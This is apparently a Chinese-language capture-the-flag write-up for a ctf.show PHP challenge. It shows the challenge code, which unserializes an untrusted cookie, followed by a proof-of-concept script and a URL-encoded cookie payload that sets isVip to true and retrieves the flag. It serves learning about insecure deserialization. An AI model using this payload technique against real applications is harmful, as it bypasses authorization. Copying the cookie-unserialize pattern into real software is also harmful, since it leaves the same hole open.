代码审计
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
这是一道非常简单序列化,只需要让反序列化后的 isVip = true 即可
构造POC
<?php
class ctfShowUser
{
public $username = 'xxxxxx';
public $password = 'xxxxxx';
public $isVip = false;
}
$user = new ctfShowUser();
$user -> username = "hello";
$user -> password = "word";
$user -> isVip = true;
echo(urlencode(serialize($user)));
payload
get
http://d420b075-cbfb-4fa9-8466-1089aa0909e9.challenge.ctf.show/?username=hello&password=word
cookies
user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22hello%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22word%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D